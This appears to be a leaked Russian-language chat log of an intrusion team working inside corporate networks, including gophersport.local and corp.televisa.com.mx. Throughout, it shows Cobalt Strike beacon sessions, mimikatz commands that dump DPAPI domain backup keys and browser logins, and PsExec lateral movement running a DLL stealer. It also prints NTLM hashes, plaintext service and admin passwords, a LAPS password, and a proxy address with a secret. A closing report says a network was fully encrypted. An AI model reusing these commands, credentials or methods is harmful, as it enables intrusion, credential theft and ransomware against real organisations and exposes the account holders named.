``там стоит вайтлиста ты был прав))со своим мастеркемсвоя логин дата тоже декриптитсядело мб в этом стейтекее``
statekeys

The statekeys command will search for Chrome/Edge AES statekey files (i.e. 'AppData\Local\Google\Chrome\User Data\Local State' and 'AppData\Local\Microsoft\Edge\User Data\Local State') and decrypts them using the same type of arguments that can be supplied for cookies and logins.

State keys can also be decrypted with a) any "{GUID}:SHA1 {GUID}:SHA1 ..." masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys, or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.

If run from an elevated context, state keys for ALL users will be triaged, otherwise only state keys for the current user will be processed.
``такая штукаhttps://github.com/GhostPack/SharpDPAPI#vaultsдавайя вроде просто могу снять мастеркейбез дк то как снять?)
он же с дк идетты можешь локально снять сам сеья тот pvk файл?а не, у нас дк нетувообщепокажи`mimikatz # dpapi::chrome /in: "Login Data" /unprotect`с ним сработалопоробуй /unprotectd?а стопдаэто я пытался свои креды вытащить``
mimikatz # dpapi::chrome /in: "C:\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI

URL : https://www.pizzahut.com/ ( https://www.pizzahut.com/index.php )
Username : uzxmvlcsyosjluxudo@upived.online
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
``https://github.com/twelvesec/passcathttps://github.com/djhohnstein/SharpChromiumпопробовал с открытым и с закрытым браузером на всякийне нашелвсе. не один не подошел(найдет твои доступы?`https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1`да\дапш включен?точно сохранила, понялпросто зарегайся типо и сохрани доступы в браузеренедоступы чего? с мимика?и сохрани доступы где нибудьпоставь плизнет, но скачать не проблема)у тебя на дедике есть едж?у меня так же(```
URL : https://norex.growthzoneapp.com/ ( https://norex.growthzoneapp.com/ap/Events/Register/yr4Y1Rop )
Username : mattpeterson@gophersport.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
``чет не подошел ни один ключ(пока нетникто не подошел?2 осталоськак там дела у @user4 ?уже не вижу)а неу меня через f7ae192f-64d6-41fa-a58a-ab726048ad7bлол[ ](https://mediaeveryone.com/group/gophersport-com?msg=Mns5nepoJGuGZKiyn) этону я на все сделалчерез какой гуид?
через этот -``
 f7ae192f-64d6-41fa-a58a-ab726048ad7b
```
или что ты имеешь ввиду?это ты через какой?``
[domainkey] with RSA private key
  key : 75597592e90e408290b2e532ed2015557eec0d4296b4517babd2e9ac26c4599cb1b23e13a3a0ba08e5ea951c69a6d773e629a37837db02ddbbf449c207bb960e
  sha1: adf71515a86e4350f103949a74d8ab9cace0237b
  sid: S-1-5-21-1434170147-1247748403-2213390517-18832

``````
sha1: 3271ea02988401e642deda7ca35b0503ec2ba7d1
sha1: f3f2faac309b0dfa98170f1a472493c7c42e0a3c
sha1: 3a048c41afa9f7d99d80a8c3b4d894f165a2f8fa
sha1: 5fc489d886bdceb4279e553361552c9910bc3d41
sha1: 0aa6cd2493ace9e5a41a22989b9cab7bfe93c857
sha1: adf71515a86e4350f103949a74d8ab9cace0237b
``все 6 перебери и скинь результатпроверь сначала это``
mimikatz # dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk
``только бэкап логиндаты сделайсид останется одини просто перебери 6 гуидов)качай все файлы + самый свежий мимик на дедиктут даже попроще+нам надо их подкинуть на дедик и там расшифвровать как я понял
и + надо знать под каким гуидом он ходил в ейджзабрал его гуидына скрине 1190у нас около 1кбда вроде 1 и тот жеслишком маленькийему .pvk нужен, а там какой-то не такой .pvkчистизабирай файлыбуду знатьда, я просто потер те файлы, хотел в другой папке выгрузить ключон меня понял)[ ](https://mediaeveryone.com/group/gophersport-com?msg=5z4u65pjDnrgX6Qs8) ты про чтотакая шляпа сильно шумит1 раза бы хватилобольше так не делайбеза логины с доменом писать?)а не. проперделся))и вот так, а дальше никак:zany_face:читер)агаи оттуда же на сам дк сделал?ты прям на дк открыл сессиюну вот и у меня были, а на дк сработалоу меня были ошибкикак?на дк z1ad2``
beacon> mimikatz !lsadump::backupkeys /system:z1ad2.gophersport.local /export
[Tasked beacon to run mimikatz's !lsadump::backupkeys /system:z1ad2.gophersport.local /export command
[+] host called home, sent: 706126 bytes
[+] received output:

Current preferred key: {90818d1b-d373-4b74-b25c-76385e8c2987}
  * RSA key
	|Provider name : Microsoft Strong Cryptographic Provider
	|Unique name :
	|Implementation: CRYPT_IMPL_SOFTWARE ;
	Algorithm : CALG_RSA_KEYX
	Key size : 2048 (0x00000800)
	Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
	Exportable key : YES
	Private export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.keyx.rsa.pvk'
	PFX container : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.pfx'
	Export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.der'

Compatibility preferred key: {bceb968a-8d19-4055-874d-2a38a1e7c2e6}
  * Legacy key
635eaf2d4ac8a48f68c71968732b556aa65b5b0e475e628b7613b7adca8c89af
f3c45fad93e7b9053e9ddd98276eb16c7af9f02116ebf3018552aca7b23e8f70
0054316bcc3a3aca201277abf1f7c24ded29f93217cb0ce6f74ee1c05be4eed9
cfcf00218ec6411d451ff1b06ea835b90b6f3f0bb2ae9967b40e5bc3034a89d2
ae584cb3eb58fe0465380a9d60768f5a5bec88f12ee9ee1532e2094f8094ec3f
ce87dc29d0ef39456afeb1385be0ee01ab232eb2c74fa8b2840e477f95c82d4d
e30a643dff5af61c7e3bbfc5227392998c3c7fadda30942594b6639d333bce74
053a4d3aab8cdd790f7152676276d9a2a1ef4d01eae30a166bdb92089d0a568f

	Export : OK - 'ntds_legacy_0_bceb968a-8d19-4055-874d-2a38a1e7c2e6.key'

``````
ilo2m24422ldv.gophersport.local
```
нет в ад комп
```
(ICMP) Target '10.1.0.86' is alive. [read 8 bytes]
10.1.0.86:443
10.1.0.86:22 (SSH-2.0-mpSSH_0.2.1)

[+] received output:
Scanner module is complete
``пока прогони хотя бы 12 нету. ну там хз. они вот так есть `https://ilo2m24422ldv.gophersport.local/z1DC1ESXi2`))кроме двухвсе есть?``
z2dc1esxi2.gophersport.local +
z2dc1esxi1.gophersport.local +
vc-z2dc1.gophersport.local +
z2dc1esxi3.gophersport.local +
z1dc1esxi1.gophersport.local +
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local +
vcz1dc1.gophersport.local +
``````
z2dc1esxi2.gophersport.local
z2dc1esxi1.gophersport.local
vc-z2dc1.gophersport.local
z2dc1esxi3.gophersport.local
z1dc1esxi1.gophersport.local
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local
vcz1dc1.gophersport.local
```проверьте имена никсов на наличие в истории у негооба доступныв ад_комп 9 никсов, и на половине +- есть веб морда сферы``
Pinging vc-z2dc1.gophersport.local [10.2.1.10] with 32 bytes of data:
Reply from 10.2.1.10: bytes=32 time=5ms TTL=62

Ping statistics for 10.2.1.10:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 5ms, Maximum = 5ms, Average = 5ms

beacon> shell ping -n 1 vcz1dc1
[*] Tasked beacon to run: ping -n 1 vcz1dc1
[+] host called home, sent: 49 bytes
[+] received output:

Pinging vcz1dc1.gophersport.local [10.10.0.128] with 32 bytes of data:
Reply from 10.10.0.128: bytes=32 time=1ms TTL=64

Ping statistics for 10.10.0.128:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 1ms, Average = 1ms

``хороший вопрос)это 2 системы?vc-z2dc1и почему у него 2 хоста vcz1dc1бруть связкине бруть к руту толькоагаэто sqlite файля выше вроде кидал - из ежакакого логин дата?а браузер еще тупитхз это из login data файлаа я чет не понял их там 2 шт?ты зашел?к стати, логин в сферу roothttps://10.2.0.11/ui/#/login1 связку только 1 рази не менять комбинациючтобы никаких следов предыдущих входов не былопосле каждого раза сбрасывай браузерпонял1 разв сферукуда?кидай сокс и пробуй их на вход``
backup Sunny2day
ilssql rehpog2013
schtask rehpog2013!
symbackup rehpog2013!
trackit rehpog2013
veeambackup rehpog2013!
erictitchenal P0w3r!23
``+они пересекаются. все еа это да тожеили они все ДА и первые 4 это ЕА+ДА?вижу 12 ДА``
-------------------------------------------------------------------------------
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard
``реально все ДА?узнаем)ну да, последние на хромиуме
только не заточен ли мимик чисто на хром?``
EA

gophersport.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:d3d9577759c6e39fb2ab8ae5528df13d:::
gophersport.com\erictitchenal:1110:aad3b435b51404eeaad3b435b51404ee:8ce83e3573f736f6fd0ca4a54f0c0f15:::
gophersport.com\mattpeterson:18832:aad3b435b51404eeaad3b435b51404ee:e17058726782234e52301c78b6391291:::
gophersport.com\o365sync:22200:aad3b435b51404eeaad3b435b51404ee:c1569f38de1cf528960da50b871c5e6d:::

EN

gophersport.local\backup:2690:aad3b435b51404eeaad3b435b51404ee:70d306f9d204e0f722eb888946fcd9b6:::
gophersport.local\ilssql:18921:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.local\schtask:18853:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\symbackup:2823:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\trackit:18916:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.com\veeambackup:21169:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.com\veeamone:21273:aad3b435b51404eeaad3b435b51404ee:2985a0d62f9ca5d79a0338869f2e3ddd:::
gophersport.local\watchguard:22112:aad3b435b51404eeaad3b435b51404ee:ae57d4b597add63fbb88b380465d592a:::
``и как следствие способ хранения доступов такие жевроде как последние версии ежа на движке хромапобщались с людьмина сколько я понялв статье про хром речь идет
или мимик все на хромиуме принимает?окно на большее он не способен)но если вам хватало встроенного на запуск нагрузки то и проще его использоватьну да, для работы с админом)мы обходились встроеным, но как ты сказал что этот надо использовать)а еще я не понял зачем вы переехали на псек если вы до этого без него обходились)``

6984153 beacon> shell PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[*] Tasked beacon to run: PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[+] host called home, sent: 118 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

``вникайhttps://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/gophersport-com?msg=YXhdLJWYw4oW92LS6) давай ящас кину кредысами решайтевторой работает вместе со мнойи кидает мне списокто то 1 сейчас собирает рабочие хеши всех ЕА, ДАа ну да, не подумалдавайте сделаем такно трафик не летитпинг до моей кобы идетвряд лиа если у админа вайтлист ip, и поэтому сесии не летят, но z1gateway в вайтлисте
можем притянуть z1gateway и пайпом попробовать притянуть админский комп?что, будем с мастеркеями ебстись?пока ничего без меня не тыкаемвам на ознакомлениеhttps://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentialsперерыв 20 минсейчас будет тяжелочтожугупс видимо вообще отклдавай играться с его пкдану гетвэй как бы намекает))он через впн ходит значитага``

Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 4 K Unknown NT AUTHORITY\SYSTEM 253:00:03 N/A
System 4 Services 0 140 K Unknown N/A 0:05:31 N/A
smss.exe 208 Services 0 732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 316 Services 0 3,268 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
csrss.exe 368 Console 1 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
wininit.exe 376 Services 0 3,236 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 404 Console 1 4,992 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 464 Services 0 8,188 K Unknown NT AUTHORITY\SYSTEM 0:00:16 N/A
lsass.exe 472 Services 0 14,920 K Unknown NT AUTHORITY\SYSTEM 0:02:16 N/A
svchost.exe 528 Services 0 7,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 556 Services 0 6,604 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:11 N/A
LogonUI.exe 660 Console 1 25,036 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 676 Console 1 8,512 K Unknown Window Manager\DWM-1 0:00:00 N/A
svchost.exe 684 Services 0 15,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:03:35 N/A
svchost.exe 716 Services 0 36,956 K Unknown NT AUTHORITY\SYSTEM 0:16:58 N/A
svchost.exe 780 Services 0 11,768 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 896 Services 0 18,136 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:24 N/A
svchost.exe 324 Services 0 12,124 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
spoolsv.exe 1028 Services 0 7,688 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 1060 Services 0 6,204 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1080 Services 0 2,232 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
inetinfo.exe 1096 Services 0 6,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1140 Services 0 2,324 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
snmp.exe 1184 Services 0 4,420 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 1204 Services 0 16,084 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 1220 Services 0 11,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
VGAuthService.exe 1280 Services 0 10,368 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
vmtoolsd.exe 1496 Services 0 6,592 K Unknown NT AUTHORITY\SYSTEM 0:05:28 N/A
svchost.exe 1512 Services 0 2,660 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1720 Services 0 12,200 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
svchost.exe 1920 Services 0 4,848 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 1316 Services 0 18,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:12:25 N/A
msdtc.exe 2256 Services 0 7,324 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
iashost.exe 1940 Services 0 14,096 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 2976 Services 0 3,112 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 2716 Services 0 16,604 K Unknown NT AUTHORITY\NETWORK SERVICE 0:16:58 N/A
w3wp.exe 3528 Services 0 12,588 K Unknown IIS APPPOOL\DefaultAppPool 0:00:02 N/A
PSEXESVC.exe 2484 Services 0 4,448 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 416 Services 0 6,024 K Unknown GOPHERSPORT\mattpeterson 0:00:00 N/A
conhost.exe 2184 Services 0 3,212 K Unknown GOPHERSPORT\mattpeterson 0:00:00 N/A
``список процесов с этого хоста`10.22.0.13:3389 z1gateway:51889 `снимите нетстат посмотрите откуда он вообще пришелхотя его клиров то нетесли у нас есть псекзек, может попробовать парралельный доступ включить и пойти по рдп?давайа вот можно ли не в кодировке?ну я кодированый послалсмотрю уже запустилвовремя тыя хочу птш пейлоад послать через псекзек
в басе64 слишком длиный
не кодированый можно пулять?не прилетелода, я ждудай сначала ямиссклик...не понял?``
6984153 beacon> desktop
``и используйте оригиналиспользуйте его только для теста открытости возможности использовать псек4) встроенный псек говноэто виртуалкаон сюда подключен через рдп``
msedge.exe 10864 RDP-Tcp#1
```внимание обратите3) exel закрыт:skull_crossbones:2) его пк1) да у него эджкаждый execнетона же один раз принимается, елуаtaslist написалсам криворукийвидимо в этом трабладаThe system cannot find the file specified.акцепеула?вы разницу реально не видите?убрал рукиблять да хватитблоу да деткауже интереснее``
The system cannot find the path specified.

``нода просто я проверяю по сто разкак то медленно все у вас крутитсяработайтесами себе_))ахахамб вы пранк устроили и зали х32?починил блять)я чет не понимаю, какой путь он не находит?
```
The system cannot find the path specified.

``чтобы без указания пути попробоватьзачем это былоc:\Windows\System32\PsExec.exeуже давно ехе залилиа еще не использоваликак то вы долговато сидитевсе, уже не причем)а при чем тут /q?а, ну мы же вроде и так указывали /qсогласен)``
-d Don't wait for process to terminate (non-interactive).
``так у псекзека же нет подобных флагов вродев духе non-interactiveне забудьте поставить еще флагипотому что tasklist лишь шаг по работе а не основная цельсразу ищем рабочий вариант исполнения через psexecнетpslist.exe может?этот ключ обязательно``
-s Run the remote process in the System account.
``из альтернатив у нас останется рдпно перепровить с оригиналом и прямым указанием кред стоитне 100% инфаэто моя версияа сам сервис на пк не имет ничегона это уходят права твоего ДАты имешь права на создание СЕРВИСА на пкдатак мы же под токеном этого да, кула мы ломимсяпо той простой причине что текущий уровень доступа сервисный тупо не имеет прав к системным утилитампереходим на класику``
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
```[ ](https://mediaeveryone.com/group/gophersport-com?msg=3L8BEgbwNBZDnpGqp) от сервсиныху какого ДА есть?неаклира его нет?файл так же пуст, под его токеномзакинул часть сессий в слиптокен переделывали т.к. вроде домен не так указалисейчас потремя делал, в начале дня еше)аа кто второй сделалсокс 11) вижу что вы переделываете себе токены по несколько раз (зачем?)
2) у вас ДОХУ и выше сессий активных в кобе (вы же в курсе что шумите пиздец как?)
3) зачем 2 активных сокса??что вы делаете?)``
185.150.190.113:61718
O5xFflqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
```дайте доступ в кобу рабочуюи еще раз проверьте список процесовсделайте его токеннеа, под другим дапод его контекстом туда ломитесь?ну у него он, видимо, открыт - не все запакуетсяпапку лучше заберитеЭТО?заберите даные его ежааналогичнобез длки?нетсразу на админский залить?попытка 2[ ](https://mediaeveryone.com/group/gophersport-com?msg=uTozKnN64N9AWsJk3) там с сессией хрень происходит. там вобще ничего не работаетаа, щас user4 придет и скажет
покурить вышел[ ](https://mediaeveryone.com/group/gophersport-com?msg=wwPwFNqg5yJxjZaQj) тутскан всегда показывал что есть рдпв чем ошибка?
я запутался чет))а до этого что была за ошибка?[ ](https://mediaeveryone.com/group/gophersport-com?msg=TrfowtY6WQK9gbMRb) всм, видно)но попробую[ ](https://mediaeveryone.com/group/gophersport-com?msg=R6wA7KnkExRHJg5Ry) а как он увидел рдп если вы до этого кидали скан где пишет что не видит?не думаю что подойдут, у всех армах разные паролироверьте их на файлик)у них такие штуки есть на армах в ад_комп
```
>ms-Mcs-AdmPwd: 0H2uIoO96Y7lmo
>ms-Mcs-AdmPwdExpirationTime: 132430931771575287
``они в ад светятсяесть, вроде как, пароль от ЛА админского пкстаего паса нет, ток сервисных учетокего пасс не вкатил?есть файлик xlsx с паролями от it, но запаролен)иногда в сети появляются
можно конечно еще фс почекать, браузерытам то же самое что и тут
штаск, рпс не доступны
сессии не летятадминксиетак же у них ноуты еще к ад подключеныих два, второй какой-то тухлый
есть его тачка но там пустодавайте пока поищем еще админови штаск видимо фаером прикрытrpc не доступенно вмик не пашет?тачки админаа видно порты z1print? или тачки админа?даа вы на этом watchguard?так стопотлично))lf`с Z1WATCHGUARD видно 445,3389,139` утверждение?user4 щас притянет, проверит
с Z1WATCHGUARD видно 445,3389,139с з1принт его 135,139,445,3389 видны?мне интересно вот чтонечто мол вирус и тдможем конечно сразу загруить через file explorer, но у него сразу окно вылезетпринт, кстати, после того как его вчера проверили почти сразу отвалился опятьчек с принтанет pf1d2swvz1print?вы откуда в него пытаетесь попасть?програмдата с арма``

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 12/02/2019 10:26:06 Adobe
          dir 10/31/2020 23:01:16 Application Data
          dir 10/31/2020 23:01:16 Desktop
          dir 10/31/2020 23:01:16 Documents
          dir 07/27/2020 11:47:34 Dolby
          dir 12/03/2019 11:33:33 FileOpen
          dir 03/13/2020 13:21:33 Intel
          dir 12/02/2020 15:28:55 Lenovo
          dir 06/25/2020 15:23:07 LogiShrd
          dir 10/31/2020 22:57:39 Microsoft
          dir 11/02/2020 07:31:25 Microsoft OneDrive
          dir 12/03/2019 11:36:28 Nuance
          dir 12/04/2019 13:55:02 Oracle
          dir 12/04/2019 08:33:27 Package Cache
          dir 11/02/2020 07:29:59 Packages
          dir 11/27/2019 09:33:19 Plantronics
          dir 12/18/2020 09:56:26 regid.1991-06.com.microsoft
          dir 11/25/2019 16:46:52 RICOH_DRV
          dir 11/25/2019 16:46:41 SnowSoftware
          dir 12/07/2019 03:14:52 SoftwareDistribution
          dir 05/11/2020 00:43:57 ssh
          dir 10/31/2020 23:01:16 Start Menu
          dir 10/31/2020 23:01:16 Templates
          dir 12/03/2019 14:25:51 Trend Micro
          dir 10/31/2020 23:01:10 USOPrivate
          dir 12/07/2019 03:14:52 USOShared
          dir 12/07/2019 03:54:01 WindowsHolographicDevices
 65kb file 11/09/2020 12:13:00 ntuser.pol


```потерсяармпри заливе на рами от туда хотели копировать на админскиймы зали его сначала на арм, где трендлибо не только трендпосле такого не поверю что там тренди ехедлл?их авер сразу дропнул при копированиипотом ехесначала дллпускать любой?способ запуска`rundll32 pg.dll,StartDLL`файлы разовыедау него x64?кидаете ему на ОС запускаете и файл упадет рядом с длл, длл должна будет удалиться как отработаетя вам выдаю длл стиллерадавайте проверять)ладно тогда в слепуюбляс эхо получилосьок, а echo 1 > test.txtно пустойфайлик то появляетсяуверены что вообще исполняется?)неаок, whoamiv это же просто расширеный вывод - не работаетбез /vя думаю может дело /q, но без него окно вылезет
не, без кавычек работало, по крайней мере длки запускали без кавычекв кавычках?пустой возвращает
```
remote-exec psexec 10.22.0.13 cmd /q /c tasklist /V>C:\ProgramData\ssh\task.txt
``````
itvm1:3389
Scanner module is complete
``по ип?[ ](https://mediaeveryone.com/group/gophersport-com?msg=ZSqorpgkjvXfYWBoE) `beacon> portscan itvm1 3389 none 1
[Tasked beacon to scan ports 3389 on itvm1
[+] host called home, sent: 93245 bytes
[-] Could not connect to pipe: 2`еще порт скан на рдп сделайтеокей, тогда жду список процесоворет?нет, пш запускать то палевноdaего тачку?а еще ребят, вы на тпш проверяли?+нет, пару минпроцесы будут долго?тренд микрои скажите еще аву него по истории 104 линка оттудаон там частый гость кстатии сказать мне его процесы)и потом прочитать через доступ к фсваша задача щас - tasklist /v записать в файл+ доступ к фсу нас есть способ запуска команд через псеккак раз)чтожниксэто не дкна дк прям висит сфера чтоли?да, этотвидимо этот нам интересен?`1803 https://vcz1dc1.gophersport.local/ui/#?extensionId=vsphere.core.inventory.serverObjectViewsExtension&objectId=urn:vmomi:VirtualMachine:vm-29463:7d9aedf7-e556-4c47-b666-fb1ecbb0b35c&navigator=vsphere.core.viTree.vmsAndTemplatesView vSphere - z1jbwmsprod1 - Summary 1 0 13252634877433381 0`у него есть такая штука`95 https://z1av.gophersport.local:4343/ Trend Micro 0 0 13235239430618240 1`какой урл нам интересен?тогда едхрома нети хром уж проверьте`AppData\Local\Google\Chrome\User Data\Default\History`я знаю что в этом`C:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History`разв не в этом файле история хранится?historyWebCacheV01.dat нужен?
он сейчас открыт у негокидайте))активный)стащите у него хистори файлтак мб у него edge активный?)дау него 10?вообще у него еще в загрузках есть ClickOnceForGoogleChome.exe
так что возможно он использует portable chromeпроцесы не посмотретьа вот хз.вопрос в другом, он им пользуетс?хорошону из его профиляа это точно его браузер?setg Proxies socks4:185.150.190.113:15452дайте проксиесли что, мы пытались подсунуть профиль на дедике в мозилу - не дает, просит почту или что то типо тогокак скажу дайте прокситогда щаса я прошу свежую версию)да не, это вчера перед уходом снялии уже все готово1 минуту назад сказалвсе бы так быстро работалипрям только что сняли?).архив сюдаэту папку profilesснимите прям сейчас его браузердля декодирования профиля в ФФ нужен мастер пароль плюс, зачем то, директория установки ФФтак пока впн включен попробую найтино у тебя ДА есть отсюда?так датак это тачка левая (через впн чел сидит) не лучше ли будеть закреп на удалённом каком нибудь сервере, что бы доступ всегда был к этой сетке, предлагаю сделать закрепы на всех трастахя тебя с закрепа запускалтак она затогда в этой сетке закреплюсь и попробую на ДК попастьда, прилетелоесть?а вот 1 улетелшелкод мимодай длпоставилв эту конфухэши я уже скинулшелкод в студиюа тут разве без ДА был?`https://phanein.televisa.com.mx/vpn/index.html`у них 2фа (((если сессии есть живые по ней, то можешь заспавнить на `rawint.com`сетка крупная, не хотелось бы её проебатькак сессия оживёт закреплюсь на каком нибудь сервере`CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P````
Nombre de grupo Domain Admins
Comentario Designated administrators of the domain

Miembros

-------------------------------------------------------------------------------
accreco avamarexchange EndPoint
ES050616C gdtidua IWAM_GSCCORP
opera_wintel_corp operador_wintel operaproy
SCMusr t1812
Se ha completado el comando correctamente.


[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.

No se ha encontrado el nombre de grupo.

Puede obtener más ayuda con el comando NET HELPMSG 2220.


[+] received output:
Se procesará la solicitud en un controlador de dominio del dominio corp.televisa.com.mx.

Number of alias administrators
Comentario Administrators have complete and unrestricted access to the computer/domain

Miembros

-------------------------------------------------------------------------------
accreco
Domain Admins
IWAM_GSCCORP
opera_wintel_corp
TELEVISA\Enterprise Admins
Se ha completado el comando correctamente.

``надеюсь успею сюда загрузить адинфоприятного отдыха, на связиа ну и отлично, так даже сам поспать успеюмы в полном составе будем находиться в офисе 15.10 в 13:00-14:00 по московкому времени :space_invader:сейчас почищу только... если смогутак что скажите какой план по времени ибо я не в курсе а мне надо будильник поставить, выйти когда вы прийдете чтобы билдер дллок залитьа потом меня отключитну мне еще часов 7-8 тут в любом случаечётенько сдохлиКак живые но вто же время не живые)Все как зомбипоспать необходимо нормальноХотелось бы завтраагасегодня*точнее сегодня
или завтра
я запуталсявы завтра ко скольки?бб1.done.sccy.comбайсчастливоспокойной ночив пн к 5тогда закончилиокей[ ](https://mediaeveryone.com/group/sccy-com?msg=yQ6392Evb6A54796L) нас долго чистили-трастов не было?сетка мелкая, но вы прилично на нее потратили времени``
Всего серверов по АД: 5
Живых серверов: 2
Притянуто серверов: 2
 
Всего армов по АД: 134
Живых армов: 28
Притянуто армов: 18

Пошифровано всё
```статистику тогда сюда+закончили?ЫАНИ ВСЕ МЕРТВЫЫпрактически, последние штрихибилд запустилизакрыли?До завтраокну давайте в районе 11 полагаю, завтра разборы текущих кейсов в основном, а послезавтра мб что в залок пойдет?Завата ко скольки,а завтра во сколько?в 22 дану тогда на сегодня закругямся@tl2 В 22 домой?Нета ну в принципе уже 22 почти...
@tl1 сказал во сколько завтра?до которого часа? Сутра работаемсорри парни у меня чет рокет отвалился а я и не заметил
если что - пишите если какой срочный вопросе надо подготовить к закрытиюдай мне свою длл, я тебя в сеть закину и создам конфу@user4 для тебя отдельная задача будеталя файлобменники, способы передачи файлов и прочеея надеюсь мне нужно объяснять что под впном вы не светите свои ресурсы?отталкивайся от /16 отсюдаднс?@user7 чек вкладку routesокок я понял свой затуп, сейчас всё будетвы страные) бросаете сети где еще не уперлись в тупик а потом у вас работы нет)и дк который ты получишь с результатов сканирования сабнетовуказав ему кредыкогда ты по впн подключен ты можешь вполне работать бладхаундом``
так он даже ДА не запросит никак без рдп

```
конечно запросита что делать, у вас есть несколько учеток, есть впн, есть сканеры и как работать с впн вы уметено там рабочий впнпонимаю когда логин/пасс не подошелвообще дада я сказал что ты отвечаешь за них?я должен был прям возглявлять операцию? "отпустил"
как я понял, я просто был вопросником здесьтак он даже ДА не запросит никак без рдптам вполне были варианты работывсе равно непонятно почему ты так легко отпустил @user7 с его задачи+я так понял вы пока с @user8 вместеа почему не работал с этим?сам впн авторизуется под этими кредамиа сам впн?\пробовал рдп, так ни один пользователь не может ходить по рдпв `lrhc.org` ентерпрайз оказался админских прав в соседнем домене, полдня производились попытки снять АДинфо. Сейчас в соседнем домене найдена тачка с серваком 2003, мс17_комманд отрабатывает, думаем добавить туда локал админа и уже дальше работатьв моей последней было 2 юзера. от одного креды не подошли, у второго стоит 2фа. так что пока с @user8 работаемну как у вас дела?если пойдет прогрес по текущим сеткам без конфы собираете инфу у себя локально как приду сразу создамокмне надо уехать, буду ближе к 6 часам+отпишите мне обратно в лс имена папок которые были внутри архивавсем выдалждемв личку 